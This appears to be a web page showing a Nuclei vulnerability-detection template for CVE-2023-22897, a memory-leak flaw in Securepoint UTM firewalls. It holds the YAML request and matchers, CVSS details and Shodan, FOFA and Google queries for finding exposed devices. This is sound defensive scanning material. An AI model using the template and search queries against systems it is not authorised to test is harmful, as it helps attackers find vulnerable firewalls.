Securepoint UTM - Leaking Remote Memory Contents
ID: CVE-2023-22897
Severity: medium
Author: DhiyaneshDK
Tags: cve,cve2023,securepoint,utm,exposure,memory
Description
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall’s endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.
YAML Source
id: CVE-2023-22897

info:
  name: Securepoint UTM - Leaking Remote Memory Contents
  author: DhiyaneshDK
  severity: medium
  description: |
    An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information stored in the device's memory.
  remediation: |
    Apply the latest security patches and updates provided by Securepoint to fix the memory leakage issue.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22897
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22897.txt
    - https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/
    - https://rcesecurity.com
    - https://github.com/MrTuxracer/advisories
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-22897
    cwe-id: CWE-908
    epss-score: 0.03238
    epss-percentile: 0.91228
    cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: securepoint
    product: unified_threat_management
    shodan-query:
      - title:"Securepoint UTM"
      - http.title:"securepoint utm"
    fofa-query: title="securepoint utm"
    google-query: intitle:"securepoint utm"
  tags: cve,cve2023,securepoint,utm,exposure,memory

http:
  - raw:
      - |
        POST /spcgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"sessionid":'
          - '"mode":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a04e5bc1700bbf504d623b3e3c56d2b0322af46cc58eeb00ecf697183078541102205dc58b31c239a383cb55c341664063da632f7ef7aa2c7f813b057b1c419ef5f1:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-22897.yaml"